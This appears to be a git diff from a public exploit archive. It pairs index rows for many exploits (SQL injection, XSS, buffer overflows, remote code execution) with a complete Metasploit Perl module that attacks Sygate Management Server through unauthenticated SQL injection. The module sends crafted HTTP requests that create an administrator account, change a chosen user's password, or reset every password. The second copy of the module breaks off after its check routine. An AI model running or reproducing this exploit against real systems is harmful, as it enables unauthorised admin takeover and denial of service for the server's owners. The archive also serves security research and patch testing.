@ -11180,7 +11180,7 @@ id,file,description,date,author,platform,type,port
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0
@ -12628,7 +12628,7 @@ id,file,description,date,author,platform,type,port
14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0
14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0
14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
@ -13066,7 +13066,7 @@ id,file,description,date,author,platform,type,port
15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
@ -13182,7 +13182,7 @@ id,file,description,date,author,platform,type,port
15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0
15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0
15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0
15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0
15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
@ -14433,7 +14433,7 @@ id,file,description,date,author,platform,type,port
16650,platforms/windows/local/16650.rb,"Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)",2010-09-25,metasploit,windows,local,0
16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0
16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0
16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0
16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0
16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0
@ -14535,7 +14535,7 @@ id,file,description,date,author,platform,type,port
16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80
16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80
16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80
16755,platforms/windows/remote/16755.rb,"Novell iManager getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
16756,platforms/windows/remote/16756.rb,"Sambar 6 Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80
16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300
16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999
@ -14687,7 +14687,7 @@ id,file,description,date,author,platform,type,port
16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0
16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0
16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0
16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing Command Injection",2011-01-08,metasploit,linux,remote,0
16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0
16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0
16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0
16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0
@ -14762,7 +14762,7 @@ id,file,description,date,author,platform,type,port
16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0
16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
@ -14924,7 +14924,7 @@ id,file,description,date,author,platform,type,port
17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
17177,platforms/windows/local/17177.rb,"MS Word Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@ -15093,7 +15093,7 @@ id,file,description,date,author,platform,type,port
17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0
17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0
17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0
17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0
17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0
@ -15165,7 +15165,7 @@ id,file,description,date,author,platform,type,port
17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@ -15312,7 +15312,7 @@ id,file,description,date,author,platform,type,port
17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
@ -16632,7 +16632,7 @@ id,file,description,date,author,platform,type,port
19270,platforms/linux/local/19270.c,"Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0
19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0
19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0
19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0
19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0
19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0
@ -21635,7 +21635,7 @@ id,file,description,date,author,platform,type,port
24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0
24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
24467,platforms/windows/remote/24467.rb,"ActFax 5.01 RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0
24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0
24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yalç?n",windows,dos,0
@ -29184,3 +29184,22 @@ id,file,description,date,author,platform,type,port
32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
32416,platforms/php/remote/32416.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
32417,platforms/php/remote/32417.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0
32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0
32421,platforms/php/webapps/32421.html,"FlatPress 0.804 Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta 'register.php' SQL Column Truncation Unauthorized Access Vulnerability",2008-09-25,StAkeR,php,webapps,0
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0
32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0
32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0
32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0
32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 'wholite.cgi' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",cgi,webapps,0
32431,platforms/php/webapps/32431.txt,"Lyrics Script 'search_results.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0
32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0



@ -1,250 +1,249 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
##
#
# Affected product : Sygate Management Server v4.1 (at least)
#
# Vulnerability : SQL-Injection in login page
# Required privs : Network access to the admin interface (HTTP)
# Impact : Raw access to the database
# Sample payload : Create a valid admin account directly in the database
#
# Editor status : Official patch available
# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
#
##
package Msf::Exploit::sygate_policy_manager;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
use vars qw{$HAS_SHA1};
BEGIN
{
$HAS_SHA1 = 0;
if (eval('require Digest::SHA1')) {
eval('use Digest::SHA1 qw(sha1);');
$HAS_SHA1 = 1;
}
}
my $advanced = { };
my $info = {
'Name' => 'Sygate Management Server SQL Injection',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'Nicob <nicob[at]nicob.net>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'],
'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a non authenticated SQL-Injection vulnerability in the
Sygate Management Server (now Symantec Policy Manager), in order to create a new
admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
Version 5 is not vulnerable.
}),
'Refs' =>
[
['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
['CVE', '2006-0522'],
['OSVDB', '22883'],
['BID', '16452'],
],
'Targets' =>
[
['Change a specific users password', 'change_user_passwd'],
['Create a new administrative account', 'add_account'],
['Reset all passwords (denial of service)', 'reset_all'],
],
'DefaultTarget' => 0,
'Keys' => ['sygate'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $request =
"GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$self->PrintLine("[*] Establishing a connection to the target...");
$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ /HTTP\/1\..\s+200/) {
$self->PrintLine("[*] Vulnerable server detected!");
return $self->CheckCode('Confirmed');
} elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
$self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Generic error...");
return $self->CheckCode('Generic');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $login = $self->GetVar('LOGIN');
my $passwd = $self->GetVar('PASSWD');
my $target = $self->Targets->[$self->GetVar('TARGET')];
if (! $HAS_SHA1) {
$self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
return;
}
# The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
my $sha1 = sha1($login.$passwd);
$sha1 =~ s/./sprintf("%02x", ord($&))/ges;
$sha1 = "0x".uc($sha1);
# Maximum level of privileges
my $privs = "255";
my %sqlpayloads =
(
# Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
'add_account' =>
"insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
"AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
"values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
# Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
'reset_all' =>
"update CMS35.Admin set Password=cast('AA' as varbinary)",
# Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
'change_user_passwd' =>
"update CMS35.Admin set Password=$sha1 where LoginName='$login'",
);
my $payload = $sqlpayloads{ $target->[1] };
# Inject our payload
$servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo";
my $request =
"GET $servlet HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Establishing a connection to the target...");
$self->PrintLine(' ');
$s->Send($request);
my $results = $s->Recv(-1, 20);
if ($results =~ /HTTP\/1\.. 200 OK/im) {
# Seems to be fine ;-)
$self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
} else {
$self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
}
$s->Close();
return;
}
sub URLEncode {
my $self = shift;
my $data = shift;
my $res;
foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}
sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}
1;
# milw0rm.com [2006-04-15]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
##
#
# Affected product : Sygate Management Server v4.1 (at least)
#
# Vulnerability : SQL-Injection in login page
# Required privs : Network access to the admin interface (HTTP)
# Impact : Raw access to the database
# Sample payload : Create a valid admin account directly in the database
#
# Editor status : Official patch available
# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
#
##
package Msf::Exploit::sygate_policy_manager;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
use vars qw{$HAS_SHA1};
BEGIN
{
$HAS_SHA1 = 0;
if (eval('require Digest::SHA1')) {
eval('use Digest::SHA1 qw(sha1);');
$HAS_SHA1 = 1;
}
}
my $advanced = { };
my $info = {
'Name' => 'Sygate Management Server SQL Injection',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'Nicob <nicob[at]nicob.net>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'],
'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a non authenticated SQL-Injection vulnerability in the
Sygate Management Server (now Symantec Policy Manager), in order to create a new
admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
Version 5 is not vulnerable.
}),
'Refs' =>
[
['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
['CVE', '2006-0522'],
['OSVDB', '22883'],
['BID', '16452'],
],
'Targets' =>
[
['Change a specific users password', 'change_user_passwd'],
['Create a new administrative account', 'add_account'],
['Reset all passwords (denial of service)', 'reset_all'],
],
'DefaultTarget' => 0,
'Keys' => ['sygate'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $request =
"GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$self->PrintLine("[*] Establishing a connection to the target...");
$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ /HTTP\/1\..\s+200/) {
$self->PrintLine("[*] Vulnerable server detected!");
return $self->CheckCode('Confirmed');
